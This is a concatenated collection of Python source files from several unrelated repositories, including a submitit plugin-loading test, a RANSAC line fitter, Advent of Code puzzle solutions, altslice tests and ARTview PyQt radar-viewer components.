def __enter__(self) -> None:
_clear_plugin_cache()
self.monkeypatch.syspath_prepend(self.tmp_path)
def __exit__(self, *exception: Any) -> None:
_clear_plugin_cache()
def _clear_plugin_cache() -> None:
plugins._get_plugins.cache_clear()
plugins.get_executors.cache_clear()
@pytest.fixture(name="plugin_creator")
def _plugin_creator(tmp_path: Path, monkeypatch) -> Iterator[PluginCreator]:
creator = PluginCreator(tmp_path, monkeypatch)
with creator:
yield creator
def test_find_good_plugin(plugin_creator: PluginCreator) -> None:
plugin_creator.add_plugin(
"submitit_good",
entry_points="""[submitit]
executor = submitit_good:GoodExecutor
job_environment = submitit_good:GoodJobEnvironment
unsupported_key = submitit_good:SomethingElse
""",
init="""
import submitit
class GoodExecutor(submitit.Executor):
pass
class GoodJobEnvironment:
pass
""",
)
executors = plugins.get_executors().keys()
# Only the plugins declared with plugin_creator are visible.
assert set(executors) == {"good", "slurm", "local", "debug"}
def test_skip_bad_plugin(caplog, plugin_creator: PluginCreator) -> None:
caplog.set_level(logging.WARNING, logger="submitit")
plugin_creator.add_plugin(
"submitit_bad",
entry_points="""[submitit]
executor = submitit_bad:NonExisitingExecutor
job_environment = submitit_bad:BadEnvironment
unsupported_key = submitit_bad:SomethingElse
""",
init="""
import submitit
class BadEnvironment:
name = "bad"
def __init__(self):
raise Exception("this is a bad environment")
""",
)
executors = plugins.get_executors().keys()
assert {"slurm", "local", "debug"} == set(executors)
assert "bad" not in executors
expected = [
(logging.ERROR, r"'submitit_bad'.*no attribute 'NonExisitingExecutor'"),
(logging.ERROR, r"'submitit_bad'.*this is a bad environment"),
(logging.WARNING, "unsupported_key = submitit_bad:SomethingElse"),
]
assert len(caplog.records) == len(expected)
for record, ex_record in zip(caplog.records, expected):
assert record.name == "submitit"
assert record.levelno == ex_record[0]
assert re.search(ex_record[1], record.getMessage())
``` |
{
"source": "jjh42/python-ardrone",
"score": 3
} |
#### File: python-ardrone/libardrone/test_h264_decoder.py
```python
import paveparser
import mock
import h264decoder
import os
def test_h264_decoder():
pngstream = mock.Mock()
decoder = h264decoder.H264ToPNG(pngstream)
example_video_stream = open(os.path.join(os.path.dirname(__file__), 'paveparser.output'))
while True:
data = example_video_stream.read(1000)
if len(data) == 0:
break
decoder.write(data)
assert pngstream.write.called
``` |
{
"source": "jjhartmann/Levenberg-Marquardt-Algorithm",
"score": 3
} |
#### File: jjhartmann/Levenberg-Marquardt-Algorithm/ransac.py
```python
import numpy as np
import random
from numpy import inner, max, diag, eye, Inf, dot
from numpy.linalg import norm, solve
import time
def stub1(test, data):
pass
def stub2(data, params, epsilon):
pass
class RansacModel:
def __init__(self, data, create_model_callback, evaluate_model_callback, epsilon=2):
self._createModelCallback = create_model_callback
self._evaluateModelCallback = evaluate_model_callback
self._data = data
self._epsilon = epsilon
def createHypothesis(self):
self._params = self._createModelCallback(self._data)
def evaluate(self):
return self._evaluateModelCallback(self._data, self._params, self._epsilon)
def getParams(self):
return self._params
def ransac(model, kmax=100):
'''
Ransac implmentation
:param model: of class RansacModel
:param kmax: max number of iterations
:return: maxinliers, best fit
'''
k = 0
maxInliers = -1
bestParams = None
while k < kmax:
k = k + 1
# Find initial hypothesis
model.createHypothesis()
# Evaluate all data
inliers = model.evaluate()
# Store best fit
if inliers > maxInliers:
maxInliers = inliers
bestParams = model.getParams()
return maxInliers, bestParams
def line_with_noise(params, x, mu=0, sigma=5):
""" Calculate Line
:param params: parameters for line equation y = mx + b ([m, b])
:param x: input values
:return: a vector containing the output of the line equation with noise
"""
m, b = params[0:2]
noise = np.random.normal(mu, sigma, len(x))
y = m * x + b + noise
return y
def createLineModel(data):
'''
Samples the data randomly and builds line model from a minimum subset
:param data:
:return:
'''
i1 = random.randint(0, len(data) - 1)
i2 = random.randint(0, len(data) - 1)
X1 = data[i1]
X2 = data[i2]
m = (X2[1] - X1[1])/(X2[0] - X1[0])
b = m * X1[0] - X1[1]
return [m, b]
def evaluateLineModel(data, params, epsilon):
'''
Evaluates all data with respect to a model hypothesis
:param data: data to fit
:param params: the model hypothesis
:param epsilon: min error to consider as a inlier
:return: number of inliers
'''
m, b = params
inliers = 0
for point in data:
y = m * point[0] + b
delta = abs(y - point[1])
if delta < epsilon:
inliers = inliers + 1
return inliers
def testRANSAC():
#############################
# TEST RANSAC
#############################
# Input
x = np.linspace(-500, 500, 1001)
# Parameters: m b
line_params = [3.56, -25.36]
# Observations
y = line_with_noise(line_params, x, 0, 2)
points = np.array([x, y]).T
line_ransac = RansacModel(points, createLineModel, evaluateLineModel, 50)
return ransac(line_ransac)
if __name__ == '__main__':
print("Test Cases")
print(testRANSAC())
``` |
{
"source": "jjhelmus/adventofcode",
"score": 4
} |
#### File: jjhelmus/adventofcode/day05a.py
```python
from __future__ import print_function
def is_nice(string):
# Does NOT contain strings
for s in ['ab', 'cd', 'pq', 'xy']:
if s in string:
return False
# contains at least three vowels
vowels = (string.count('a') + string.count('e') + string.count('i') +
string.count('o') + string.count('u'))
if vowels < 3:
return False
# contains at least one letter that appears twice in a row
if any([string[i] == string[i+1] for i in range(len(string)-1)]):
return True
else:
return False
test_strings = ['ugknbfddgicrmopn', 'aaa', 'jchzalrnumimnmhp',
'haegwjzuvuyypxyu', 'dvszwmarrgswjxmb']
for test_string in test_strings:
print(test_string, ":", is_nice(test_string))
f = open('inputs/input05.txt')
nice_strings = 0
for line in f:
if is_nice(line.strip()):
nice_strings += 1
print("Nice strings:", nice_strings)
f.close()
```
#### File: jjhelmus/adventofcode/day05b.py
```python
from __future__ import print_function
def is_nice(string):
# repeats with exactly one letter between them
if not any([string[i] == string[i+2] for i in range(len(string)-2)]):
return False
# pair appears at least twice
if any([(string.count(string[i:i+2])>=2) for i in range(len(string)-2)]):
return True
return False
test_strings = [
'qjhvhtzxzqqjkmpb',
'xxyxx',
'uurcxstgmygtbstg',
'ieodomkazucvgmuy']
for test_string in test_strings:
print(test_string, ":", is_nice(test_string))
f = open('inputs/input05.txt')
nice_strings = 0
for line in f:
if is_nice(line.strip()):
nice_strings += 1
print("Nice strings:", nice_strings)
f.close()
```
#### File: jjhelmus/adventofcode/day07.py
```python
from __future__ import print_function
class Wire(object):
def __init__(self, line):
self._line = line
self.parse_line(line)
def parse_line(self, line):
lline = line.split()
self.output = lline[-1]
left = lline[:-2]
self.op = 'ASSIGN'
for op in ['NOT', 'AND', 'OR', 'LSHIFT', 'RSHIFT']:
if op in left:
self.op = op
left.remove(op)
self.inputs = [int(i) if i.isdigit() else i for i in left]
def reset(self):
self.parse_line(self._line)
def evaluate(self):
if self.op == 'ASSIGN':
return int(self.inputs[0])
elif self.op == 'NOT':
return int(65535 - self.inputs[0])
elif self.op == 'AND':
return int(self.inputs[0] & self.inputs[1])
elif self.op == 'OR':
return int(self.inputs[0] | self.inputs[1])
elif self.op == 'LSHIFT':
return int(self.inputs[0] << self.inputs[1])
elif self.op == 'RSHIFT':
return int(self.inputs[0] >> self.inputs[1])
else:
raise ValueError('invalid operator')
def fill_inputs(self, signals):
self.inputs = [signals[i] if i in signals else i for i in self.inputs]
def iscomplete(self):
return all([isinstance(i, int) for i in self.inputs])
with open('inputs/input07.txt') as f:
wires = [Wire(line) for line in f]
wires_copy = list(wires)
def evaluate_circuit(wires, signals):
local_wires = list(wires)
while len(local_wires) != 0:
new_wires = []
for wire in wires:
if wire.iscomplete():
signals[wire.output] = wire.evaluate()
else:
wire.fill_inputs(signals)
new_wires.append(wire)
local_wires = new_wires
return signals
signals = evaluate_circuit(wires, {})
print('a', signals['a'])
[wire.reset() for wire in wires]
wires = [wire for wire in wires if wire.output != 'b']
signals = evaluate_circuit(wires, {'b': signals['a']})
print('a', signals['a'])
```
#### File: jjhelmus/adventofcode/day12.py
```python
from __future__ import print_function
import json
def sum_of_item(item, skip_red=False):
if isinstance(item, list):
return sum([sum_of_item(i, skip_red) for i in item])
if isinstance(item, dict):
if skip_red and 'red' in item.values():
return 0
return sum([sum_of_item(i, skip_red) for i in item.values()])
if isinstance(item, unicode):
return 0
if isinstance(item, int):
return item
with open('inputs/input12.txt') as f:
abacus = json.load(f)
print(sum_of_item(abacus))
print(sum_of_item(abacus, skip_red=True))
```
#### File: jjhelmus/adventofcode/day13.py
```python
from __future__ import print_function
import itertools
verbose = False
happiness = {}
people = set()
#f = open('inputs/input13_test.txt')
f = open('inputs/input13.txt')
for line in f:
split_line = line.split()
person1 = split_line[0]
direction = split_line[2]
amount = int(split_line[3])
person2 = split_line[10][:-1]
if verbose:
print(person1, direction, amount, person2)
people.add(person1)
people.add(person2)
if direction == 'lose':
happiness[person1+person2] = -amount
else:
assert direction == 'gain'
happiness[person1+person2] = amount
f.close()
if verbose:
print(people)
print(happiness)
def find_maximum_happiness(people, happiness):
maximum_happiness = 0
for arragement in itertools.permutations(people):
happiness_gained = 0
for person1, person2 in zip(arragement[:-1], arragement[1:]):
happiness_gained += happiness[person1 + person2]
happiness_gained += happiness[person2 + person1]
# add happiness for first and last pair
person1 = arragement[0]
person2 = arragement[-1]
happiness_gained += happiness[person1 + person2]
happiness_gained += happiness[person2 + person1]
maximum_happiness = max(maximum_happiness, happiness_gained)
if verbose:
print(arragement, happiness_gained)
return maximum_happiness
print(find_maximum_happiness(people, happiness))
# part b
for person in people:
happiness['Self' + person] = 0
happiness[person + 'Self'] = 0
people.add('Self')
print(find_maximum_happiness(people, happiness))
```
#### File: jjhelmus/adventofcode/day19a.py
```python
from __future__ import print_function
import re
def find_all_replacements(base_molecule, match, replace):
indices = [m.start() for m in re.finditer(match, base_molecule)]
lm = len(match)
return [base_molecule[:i]+replace+base_molecule[i+lm:] for i in indices]
molecules = set()
test_molecule = 'HOHOHO'
molecules.update(find_all_replacements(test_molecule, 'H', 'HO'))
molecules.update(find_all_replacements(test_molecule, 'H', 'OH'))
molecules.update(find_all_replacements(test_molecule, 'O', 'HH'))
print(len(molecules))
# Part A
lines = [line for line in open('inputs/input19.txt')]
base_molecule = lines[-1].strip()
molecules = set()
for line in lines:
if '=>' not in line:
continue
match, _, replace = line.split()
molecules.update(find_all_replacements(base_molecule, match, replace))
print(len(set(molecules)))
```
#### File: jjhelmus/adventofcode/day22.py
```python
from __future__ import print_function
import re
import itertools
import collections
SPELL_COSTS = {
'magic_missle': 53,
'drain': 73,
'shield': 113,
'poison': 173,
'recharge': 229,
}
def apply_effects(game):
if game['shield_timer']:
game['shield_timer'] = game['shield_timer'] - 1
if game['shield_timer'] == 0:
game['player_armor'] = 0
if game['poison_timer']:
game['boss_hp'] = game['boss_hp'] - 3
game['poison_timer'] = game['poison_timer'] - 1
if game['recharge_timer']:
game['player_mana'] = game['player_mana'] + 101
game['recharge_timer'] = game['recharge_timer'] - 1
def player_turn(game, spell):
if spell == 'magic_missle':
game['boss_hp'] = game['boss_hp'] - 4
elif spell == 'drain':
game['boss_hp'] = game['boss_hp'] - 2
game['player_hp'] = game['player_hp'] + 2
elif spell == 'shield':
game['shield_timer'] = 6
game['player_armor'] = game['player_armor'] + 7
elif spell == 'poison':
game['poison_timer'] = 6
elif spell == 'recharge':
game['recharge_timer'] = 5
game['player_mana'] = game['player_mana'] - SPELL_COSTS[spell]
def boss_turn(game):
dmg = max(game['boss_dmg'] - game['player_armor'], 1)
game['player_hp'] = game['player_hp'] - dmg
def check_for_endgame(game, min_mana_spent):
if game['boss_hp'] <= 0:
min_mana_spent = min(game['mana_spent'], min_mana_spent)
return 1, min_mana_spent
if game['player_hp'] <= 0:
return 2, min_mana_spent
return 0, min_mana_spent
def find_minimal_mana(game, part_b):
min_mana_spent = 9999999
games = [game]
while len(games):
games, min_mana_spent = try_all_games(games, min_mana_spent, part_b)
return min_mana_spent
def try_all_games(games, min_mana_spent, part_b):
new_games = []
for game in games:
if part_b:
game['player_hp'] = game['player_hp'] - 1
endgame, min_mana_spent = check_for_endgame(game, min_mana_spent)
if endgame:
continue
# apply player's turn effects
apply_effects(game)
endgame, min_mana_spent = check_for_endgame(game, min_mana_spent)
if endgame:
continue
min_mana_spent = try_all_spells(game, min_mana_spent, new_games)
return new_games, min_mana_spent
def try_all_spells(game, min_mana_spent, new_games):
castable_spells = [spell for spell, cost in SPELL_COSTS.items()
if cost <= game['player_mana']]
if game['shield_timer'] and 'shield' in castable_spells:
castable_spells.remove('shield')
if game['poison_timer'] and 'poison' in castable_spells:
castable_spells.remove('poison')
if game['recharge_timer'] and 'recharge' in castable_spells:
castable_spells.remove('recharge')
for spell in castable_spells:
sub_game = game.copy()
sub_game['spells_cast'] = list(sub_game['spells_cast']) + [spell]
sub_game['mana_spent'] = sub_game['mana_spent']+SPELL_COSTS[spell]
# players turn
player_turn(sub_game, spell)
endgame, min_mana_spent = check_for_endgame(sub_game, min_mana_spent)
if endgame:
continue
# end early is too much mana spent
if sub_game['mana_spent'] > min_mana_spent:
continue
# boss's turn
apply_effects(sub_game)
endgame, min_mana_spent = check_for_endgame(sub_game, min_mana_spent)
if endgame:
continue
boss_turn(sub_game)
endgame, min_mana_spent = check_for_endgame(sub_game, min_mana_spent)
if endgame:
continue
new_games.append(sub_game)
return min_mana_spent
initial_game = {
'player_hp': 50,
'player_mana': 500,
'player_armor': 0,
'boss_hp': 55,
'boss_dmg': 8,
'shield_timer': 0,
'poison_timer': 0,
'recharge_timer': 0,
'spells_cast': [],
'mana_spent': 0,
}
print(find_minimal_mana(initial_game.copy(), part_b=False))
print(find_minimal_mana(initial_game.copy(), part_b=True))
``` |
{
"source": "jjhelmus/altslice",
"score": 3
} |
#### File: altslice/tests/test_sequence.py
```python
from altslice import SequenceSlicer
def test_categorical():
data = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
sequence = [0.1, 0.5, 1.2, 2.4, 2.8, 3.6, 4.6, 5.9, 7.7, 9.9]
# data 1 2 3 4 5 6 7 8 9 10
slicer = SequenceSlicer(sequence)
# single index
assert data[slicer[0.1]] == 1
assert data[slicer[2.8]] == 5
# start:end
assert data[slicer[0.1:2.3]] == [1, 2, 3]
assert data[slicer[1.2:6.]] == [3, 4, 5, 6, 7, 8]
# :end
assert data[slicer[:1.0]] == [1, 2]
# start:
assert data[slicer[3.2:]] == [6, 7, 8, 9, 10]
# as a slice-like object
assert data[slicer(1.0)] == [1, 2]
assert data[slicer(-0.2, 2.0)] == [1, 2, 3]
assert data[slicer(1, 6)] == [3, 4, 5, 6, 7, 8]
```
#### File: altslice/tests/test_uniform.py
```python
from altslice import UniformSlicer
def test_uniform():
data = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
# 1 11 21 31 41 51 61 71 81 91
slicer = UniformSlicer(start=1, step=10)
# single index
assert data[slicer[1]] == 1
assert data[slicer[41]] == 5
# start:end
assert data[slicer[1:31]] == [1, 2, 3]
assert data[slicer[21:81]] == [3, 4, 5, 6, 7, 8]
# :end
assert data[slicer[:21]] == [1, 2]
# start:
assert data[slicer[51:]] == [6, 7, 8, 9, 10]
# as a slice-like object
assert data[slicer(21)] == [1, 2]
assert data[slicer(1, 31)] == [1, 2, 3]
assert data[slicer(21, 81)] == [3, 4, 5, 6, 7, 8]
``` |
{
"source": "jjhelmus/artview",
"score": 3
} |
#### File: artview/components/component_control.py
```python
from functools import partial
from ..core import Variable, Component, QtGui, QtCore, common, componentsList
class LinkPlugins(Component):
'''
Class instance for control variables shared between components.
The user may select two components from a list. A radio menu is
added for every common sharable variable. Each variable may be unlinked
from similar instance in the other component.
This is a powerful Component, multiple instances may conflict.
'''
@classmethod
def guiStart(self, parent=None):
kwargs, independent = \
common._SimplePluginStart("LinkPlugins").startDisplay()
kwargs['parent'] = parent
return self(**kwargs), independent
def __init__(self, components=None, name="LinkPlugins", parent=None):
'''Initialize the class to create the interface.
Parameters
----------
[Optional]
components : list of :py:class:`~artview.core.core.Component` instance
Components to control. If None will use the global list present in
artview.core.core.componentsList
name : string
Field Radiobutton window name.
parent : PyQt instance
Parent instance to associate to this class.
If None, then Qt owns, otherwise associated with parent PyQt
instance.
'''
super(LinkPlugins, self).__init__(name=name, parent=parent)
self.central_widget = QtGui.QWidget()
self.setCentralWidget(self.central_widget)
self.layout = QtGui.QGridLayout(self.central_widget)
if components is None:
self.components = componentsList
QtCore.QObject.connect(
self.components, QtCore.SIGNAL("ComponentAppended"),
self._updateComponentList)
QtCore.QObject.connect(
self.components, QtCore.SIGNAL("ComponentRemoved"),
self._updateComponentList)
else:
self.components = components
self.comp0 = None
self.comp1 = None
self.setupUi()
self.show()
def _setVariables(self):
'''Determine common variables to both components.'''
self.variables = []
for var in self.comp0.sharedVariables.keys():
if var in self.comp1.sharedVariables.keys():
self.variables.append(var)
########################
# Button methods #
########################
def setupUi(self):
'''Build main layout.'''
if len(self.components) == 0:
return
if self.comp0 not in self.components:
self.comp0 = self.components[0]
if self.comp1 not in self.components:
self.comp1 = self.components[0]
# Select Components buttons
self.combo0 = QtGui.QComboBox()
self.combo0.activated[int].connect(self._comp0Action)
self.combo1 = QtGui.QComboBox()
self.combo1.activated[int].connect(self._comp1Action)
self.layout.addWidget(self.combo0, 0, 0)
self.layout.addWidget(self.combo1, 1, 0)
# Fill buttons
for component in self.components:
self.combo0.addItem(component.name)
self.combo1.addItem(component.name)
self.combo0.setCurrentIndex(self.components.index(self.comp0))
self.combo1.setCurrentIndex(self.components.index(self.comp1))
self._setVariables()
self._setRadioButtons()
def _setRadioButtons(self):
'''Add radio buttons for control over the variables.'''
# Radio Buttons
self.radioLayout = QtGui.QGridLayout()
self.layout.addLayout(self.radioLayout, 2, 0)
self.radioLayout.addWidget(QtGui.QLabel("Link"), 0, 1)
self.radioLayout.addWidget(QtGui.QLabel("Unlink"), 0, 2)
self.radioBoxes = []
for idx, var in enumerate(self.variables):
self._addRadioButton(var, idx)
def _addRadioButton(self, var, idx):
'''Add radio button for variable in the given index.'''
radioBox = QtGui.QButtonGroup()
self.radioBoxes.append(radioBox) # avoid garbage collector
link = QtGui.QRadioButton()
unlink = QtGui.QRadioButton()
QtCore.QObject.connect(link, QtCore.SIGNAL("clicked()"),
partial(self.connectVar, var))
QtCore.QObject.connect(unlink, QtCore.SIGNAL("clicked()"),
partial(self.disconnectVar, var))
radioBox.addButton(link)
radioBox.addButton(unlink)
if getattr(self.comp0, var) is getattr(self.comp1, var):
link.setChecked(True)
else:
unlink.setChecked(True)
if self.comp0 is self.comp1:
unlink.setDisabled(True)
self.radioLayout.addWidget(QtGui.QLabel(var[1::]), idx+1, 0)
self.radioLayout.addWidget(link, idx+1, 1)
self.radioLayout.addWidget(unlink, idx+1, 2)
def _comp0Action(self, idx):
'''Update Component 0.'''
self.comp0 = self.components[idx]
self._setVariables()
self._clearLayout(self.radioLayout)
self.layout.removeItem(self.radioLayout)
self._setRadioButtons()
def _comp1Action(self, idx):
'''Update Component 1.'''
self.comp1 = self.components[idx]
self._setVariables()
self._clearLayout(self.radioLayout)
self.layout.removeItem(self.radioLayout)
self._setRadioButtons()
def connectVar(self, var):
'''Assign variable in component 0 to component 1.'''
# Disconect old Variable
self.comp1.disconnectSharedVariable(var)
# comp1.var = comp0.var
setattr(self.comp1, var, getattr(self.comp0, var))
# Connect new Variable
self.comp1.connectSharedVariable(var)
# emit signal
getattr(self.comp1, var).update()
print("connect var %s of %s from %s" % (
var, self.comp1.name, self.comp0.name))
def disconnectVar(self, var):
'''Turn variable in component 1 independente of component 0.'''
# Disconect old Variable
self.comp1.disconnectSharedVariable(var)
# comp1.var = Variable()
setattr(self.comp1, var, Variable())
# Connect new Variable
self.comp1.connectSharedVariable(var)
# emit signal
getattr(self.comp1, var).update()
print("disconnect var %s of %s from %s" % (
var, self.comp1.name, self.comp0.name))
def _clearLayout(self, layout):
'''Recursively remove items from layout.'''
while layout.count():
item = layout.takeAt(0)
widget = item.widget()
if widget is not None:
widget.deleteLater()
else:
self._clearLayout(item.layout())
def _updateComponentList(self, item):
'''Rebuild main layout.'''
self._clearLayout(self.layout)
self.setupUi()
```
#### File: artview/components/field.py
```python
from functools import partial
from ..core import Variable, Component, QtGui, QtCore
class FieldButtonWindow(Component):
'''Class to display a Window with Field name radio buttons.'''
Vradar = None #: see :ref:`shared_variable`
Vfield = None #: see :ref:`shared_variable`
def __init__(self, Vradar=None, Vfield=None, name="FieldButtons",
parent=None):
'''
Initialize the class to create the interface.
Parameters
----------
[Optional]
Vradar : :py:class:`~artview.core.core.Variable` instance
Radar signal variable. If None start new one with None
Vfield : :py:class:`~artview.core.core.Variable` instance
Field signal variable. If None start new one empty string
name : string
Field Radiobutton window name.
parent : PyQt instance
Parent instance to associate to FieldButtonWindow.
If None, then Qt owns, otherwise associated with parent PyQt
instance.
Notes
-----
This class records the selected button and passes the
change value back to variable.
'''
super(FieldButtonWindow, self).__init__(name=name, parent=parent)
# Set up signal, so that DISPLAY can react to external
# (or internal) changes in field (Core.Variable instances expected)
# The change is sent through Vfield
if Vradar is None:
self.Vradar = Variable(None)
else:
self.Vradar = Vradar
if Vfield is None:
self.Vfield = Variable('')
else:
self.Vfield = Vfield
self.sharedVariables = {"Vradar": self.NewRadar,
"Vfield": self.NewField}
self.connectAllVariables()
self.CreateFieldWidget()
self.SetFieldRadioButtons()
self.show()
########################
# Button methods #
########################
def FieldSelectCmd(self, field):
'''Captures a selection and updates field variable.'''
self.Vfield.change(field)
def CreateFieldWidget(self):
'''Create a widget to store radio buttons to control field adjust.'''
self.radioBox = QtGui.QGroupBox("Field Selection", parent=self)
self.rBox_layout = QtGui.QVBoxLayout(self.radioBox)
self.radioBox.setLayout(self.rBox_layout)
self.setCentralWidget(self.radioBox)
def SetFieldRadioButtons(self):
'''Set a field selection using radio buttons.'''
# Instantiate the buttons into a list for future use
self.fieldbutton = {}
if self.Vradar.value is None:
return
# Loop through and create each field button and
# connect a value when selected
for field in self.Vradar.value.fields.keys():
button = QtGui.QRadioButton(field, self.radioBox)
self.fieldbutton[field] = button
QtCore.QObject.connect(button, QtCore.SIGNAL("clicked()"),
partial(self.FieldSelectCmd, field))
self.rBox_layout.addWidget(button)
# set Checked the current field
self.NewField(self.Vfield, self.Vfield.value, True)
def NewField(self, variable, value, strong):
'''Slot for 'ValueChanged' signal of
:py:class:`Vfield <artview.core.core.Variable>`.
This will:
* Update radio check
'''
if (self.Vradar.value is not None and
value in self.Vradar.value.fields):
self.fieldbutton[value].setChecked(True)
def NewRadar(self, variable, value, strong):
'''Slot for 'ValueChanged' signal of
:py:class:`Vradar <artview.core.core.Variable>`.
This will:
* Recreate radio items
'''
self.CreateFieldWidget()
self.SetFieldRadioButtons()
```
#### File: artview/artview/__main__.py
```python
import sys
import os
path = os.path.dirname(sys.modules[__name__].__file__)
path = os.path.join(path, '..')
sys.path.insert(0, path)
import artview
def main(argv):
script, DirIn, filename, field = artview.parser.parse(argv)
if script:
artview.scripts.scripts[script](DirIn, filename, field)
else:
artview.run(DirIn, filename, field)
if __name__ == "__main__":
main(sys.argv)
```
#### File: artview/artview/parser.py
```python
import argparse
import sys
# Get the version
# AG - python 3 decided it doesn't like scripts inside modules.
# I have read some posts about it and no one has a real solution.
# http://stackoverflow.com/questions/16981921/relative-imports-in-python-3
try:
try:
import version
except:
from . import version
VERSION = version.version
except:
import warnings
warnings.warn("No ARTview Version!")
VERSION = 'no version'
NAME = 'ARTview'
def parse(argv):
'''
Parse the input command line.
Parameters::
----------
argv - string
Input command line string.
Notes::
-----
Returns directory and field for initialization.
'''
parser = argparse.ArgumentParser(
description="Start ARTview - the ARM Radar Toolkit Viewer.")
parser.add_argument('-v', '--version', action='version',
version='ARTview version %s' % (VERSION))
# Directory argument now optional
parser.add_argument('-d', '--directory', type=str,
help='directory to open', default='./')
parser.add_argument('-f', '--field', type=str, help='Field to show',
default=None)
parser.add_argument('-F', '--file', type=str, help='File to show',
default=None)
parser.add_argument(
'-s', '--script', type=str,
help='Select from artview.scripts a script to execute', default=None)
# Parse the args
args = parser.parse_args(argv[1::])
return args.script, args.directory, args.file, args.field
```
#### File: artview/plugins/calculate_attenuation.py
```python
from functools import partial
import pyart
import time
from ..core import Component, Variable, common, QtGui, QtCore, VariableChoose
class CalculateAttenuation(Component):
'''
Interface for executing :py:func:`pyart.correct.calculate_attenuation`
'''
Vradar = None #: see :ref:`shared_variable`
@classmethod
def guiStart(self, parent=None):
'''Graphical interface for starting this class'''
kwargs, independent = \
common._SimplePluginStart("CalculateAttenuation").startDisplay()
kwargs['parent'] = parent
return self(**kwargs), independent
def __init__(self, Vradar=None, # Vgatefilter=None,
name="CalculateAttenuation", parent=None):
'''Initialize the class to create the interface.
Parameters
----------
[Optional]
Vradar : :py:class:`~artview.core.core.Variable` instance
Radar signal variable.
A value of None initializes an empty Variable.
name : string
Field Radiobutton window name.
parent : PyQt instance
Parent instance to associate to this class.
If None, then Qt owns, otherwise associated w/ parent PyQt instance
'''
super(CalculateAttenuation, self).__init__(name=name, parent=parent)
self.central_widget = QtGui.QWidget()
self.setCentralWidget(self.central_widget)
self.layout = QtGui.QGridLayout(self.central_widget)
if Vradar is None:
self.Vradar = Variable(None)
else:
self.Vradar = Vradar
self.sharedVariables = {"Vradar": None}
self.connectAllVariables()
self.generalLayout = QtGui.QGridLayout()
self.layout.addLayout(self.generalLayout, 0, 0, 1, 2)
self.helpButton = QtGui.QPushButton("Help")
self.helpButton.clicked.connect(self._displayHelp)
self.layout.addWidget(self.helpButton, 1, 0, 1, 1)
self.button = QtGui.QPushButton("Correct")
self.button.clicked.connect(self.calculate_attenuation)
self.button.setToolTip('Execute pyart.correct.calculate_attenuation')
self.layout.addWidget(self.button, 1, 1, 1, 1)
self.addGeneralOptions()
self.show()
def addGeneralOptions(self):
'''Mount Options Layout.'''
self.radarButton = QtGui.QPushButton("Find Variable")
self.radarButton.clicked.connect(self.chooseRadar)
self.generalLayout.addWidget(QtGui.QLabel("Radar"), 0, 0)
self.generalLayout.addWidget(self.radarButton, 0, 1)
self.zOffset = QtGui.QDoubleSpinBox()
self.zOffset.setRange(-1000, 1000)
self.generalLayout.addWidget(QtGui.QLabel("z_offset"), 1, 0)
self.generalLayout.addWidget(self.zOffset, 1, 1)
self.debug = QtGui.QCheckBox("debug")
self.debug.setChecked(False)
self.generalLayout.addWidget(self.debug, 2, 1)
self.doc = QtGui.QDoubleSpinBox()
self.doc.setRange(-1000, 1000)
self.doc.setValue(15)
self.generalLayout.addWidget(QtGui.QLabel("doc"), 3, 0)
self.generalLayout.addWidget(self.doc, 3, 1)
self.fzl = QtGui.QDoubleSpinBox()
self.fzl.setRange(-100000, 1000000)
self.fzl.setValue(4000)
self.generalLayout.addWidget(QtGui.QLabel("fzl"), 4, 0)
self.generalLayout.addWidget(self.fzl, 4, 1)
self.rhvMin = QtGui.QDoubleSpinBox()
self.rhvMin.setRange(-100000, 1000000)
self.rhvMin.setValue(0.8)
self.generalLayout.addWidget(QtGui.QLabel("rhv_min"), 5, 0)
self.generalLayout.addWidget(self.rhvMin, 5, 1)
self.ncpMin = QtGui.QDoubleSpinBox()
self.ncpMin.setRange(-100000, 1000000)
self.ncpMin.setValue(0.5)
self.generalLayout.addWidget(QtGui.QLabel("ncp_min"), 6, 0)
self.generalLayout.addWidget(self.ncpMin, 6, 1)
self.aCoef = QtGui.QDoubleSpinBox()
self.aCoef.setRange(-100000, 1000000)
self.aCoef.setValue(0.06)
self.generalLayout.addWidget(QtGui.QLabel("a_coef"), 7, 0)
self.generalLayout.addWidget(self.aCoef, 7, 1)
self.beta = QtGui.QDoubleSpinBox()
self.beta.setRange(-100000, 1000000)
self.beta.setValue(0.8)
self.generalLayout.addWidget(QtGui.QLabel("beta"), 8, 0)
self.generalLayout.addWidget(self.beta, 8, 1)
self.reflField = QtGui.QLineEdit("")
self.generalLayout.addWidget(QtGui.QLabel("refl_field"), 9, 0)
self.generalLayout.addWidget(self.reflField, 9, 1)
self.ncpField = QtGui.QLineEdit("")
self.generalLayout.addWidget(QtGui.QLabel("ncp_field"), 10, 0)
self.generalLayout.addWidget(self.ncpField, 10, 1)
self.rhvField = QtGui.QLineEdit("")
self.generalLayout.addWidget(QtGui.QLabel("rhv_field"), 11, 0)
self.generalLayout.addWidget(self.rhvField, 11, 1)
self.phidpField = QtGui.QLineEdit("")
self.generalLayout.addWidget(QtGui.QLabel("phidp_field"), 12, 0)
self.generalLayout.addWidget(self.phidpField, 12, 1)
self.specAtField = QtGui.QLineEdit("")
self.generalLayout.addWidget(QtGui.QLabel("spec_at_field"), 13, 0)
self.generalLayout.addWidget(self.specAtField, 13, 1)
self.corrReflField = QtGui.QLineEdit("")
self.generalLayout.addWidget(QtGui.QLabel("corr_refl_field"), 14, 0)
self.generalLayout.addWidget(self.corrReflField, 14, 1)
def chooseRadar(self):
'''Get Radar with :py:class:`~artview.core.VariableChoose`'''
item = VariableChoose().chooseVariable()
if item is None:
return
else:
self.Vradar = getattr(item[1], item[2])
def _displayHelp(self):
'''Display Py-Art's docstring for help.'''
common.ShowLongText(pyart.correct.calculate_attenuation.__doc__)
def calculate_attenuation(self):
'''Mount Options and execute
:py:func:`~pyart.correct.calculate_attenuation`.
The resulting fields are added to Vradar.
Vradar is updated, strong or weak depending on overwriting old fields.
'''
# test radar
if self.Vradar.value is None:
common.ShowWarning("Radar is None, can not perform correction.")
return
# mount options
args = {
'radar': self.Vradar.value,
'z_offset': self.zOffset.value(),
'debug': self.debug.isChecked(),
'doc': self.doc.value(),
'fzl': self.fzl.value(),
'rhv_min': self.rhvMin.value(),
'ncp_min': self.ncpMin.value(),
'a_coef': self.aCoef.value(),
'beta': self.beta.value(),
'refl_field': [None if a == "" else a for a in (
str(self.reflField.text()),)][0],
'ncp_field': [None if a == "" else a for a in (
str(self.ncpField.text()),)][0],
'rhv_field': [None if a == "" else a for a in (
str(self.rhvField.text()),)][0],
'phidp_field': [None if a == "" else a for a in (
str(self.phidpField.text()),)][0],
